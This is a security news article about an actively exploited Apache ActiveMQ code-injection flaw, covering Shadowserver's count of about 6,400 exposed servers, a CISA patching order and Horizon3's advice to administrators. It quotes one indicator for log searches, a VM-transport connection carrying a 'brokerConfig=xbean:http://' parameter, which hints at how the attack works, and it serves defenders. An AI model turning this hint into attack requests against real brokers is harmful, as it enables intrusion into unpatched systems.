Actively exploited Apache ActiveMQ flaw impacts 6,400 servers

Published: 2 days ago (April 21, 2026 at 07:17 AM EDT)

2 min read

Source: Bleeping Computer

Overview

Nonprofit security organization Shadowserver identified more than 6,400 Apache ActiveMQ servers exposed online that are vulnerable to an actively exploited, high‑severity code‑injection flaw.

Apache ActiveMQ is the most popular open‑source, multi‑protocol message broker used for asynchronous communication between Java applications.

Vulnerability Details

CVE‑2026‑34197 – tracked at the NVD:
Discovered by Horizon3 researcher Naveen Sunkavally using the Claude AI assistant (details: ).
The flaw stems from improper input validation, allowing authenticated threat actors to execute arbitrary code on unpatched systems.

The Apache maintainers released a patch on 30 March 2026 for ActiveMQ Classic versions 6.2.3 and 5.19.4 (announcement: ).

Impact

ShadowServer’s monitoring on 17‑20 April 2026 showed more than 6,400 unique IP addresses with ActiveMQ fingerprints exposed online, with the majority located in:

Asia: 2,925
North America: 1,409
Europe: 1,334

Unpatched ActiveMQ servers exposed online (Shadowserver)

CISA Advisory

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged the vulnerability as actively exploited and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their servers by 30 April 2026:

Exploitation notice:
Mitigation deadline:

CISA’s statement emphasized the risk to the federal enterprise and urged agencies to:

Apply vendor‑provided mitigations.
Follow BOD 22‑01 guidance for cloud services.
Discontinue use of the product if mitigations are unavailable.

Recommendations for Administrators

Horizon3 researchers advise administrators to:

Search ActiveMQ broker logs for suspicious connections that use the internal transport protocol VM and the brokerConfig=xbean:http:// query parameter.
Treat this issue as high priority, given ActiveMQ’s history as a repeated target for real‑world attackers.

“We recommend organizations running ActiveMQ treat this as a high priority, as ActiveMQ has been a repeated target for real‑world attackers, and methods for exploitation and post‑exploitation of ActiveMQ are well‑known.” – Horizon3

CISA has also tagged two additional ActiveMQ CVEs as exploited in the wild:

CVE‑2016‑3088 –
CVE‑2023‑46604 – (targeted by the TellYouThePass ransomware gang: )

For further details, refer to the linked sources and apply the recommended mitigations promptly.

Actively exploited Apache ActiveMQ flaw impacts 6,400 servers

Overview

Vulnerability Details

Impact

CISA Advisory

Recommendations for Administrators

Related posts

New Checkmarx supply-chain breach affects KICS analysis tool

New GopherWhisper APT group abuses Outlook, Slack, Discord for comms

CISA orders feds to patch BlueHammer flaw exploited as zero-day

Microsoft Teams to get efficiency mode on PCs with limited resources

Overview

Vulnerability Details

Impact

CISA Advisory

Recommendations for Administrators

Related Apache ActiveMQ Vulnerabilities

Related posts

New Checkmarx supply-chain breach affects KICS analysis tool

New GopherWhisper APT group abuses Outlook, Slack, Discord for comms

CISA orders feds to patch BlueHammer flaw exploited as zero-day

Microsoft Teams to get efficiency mode on PCs with limited resources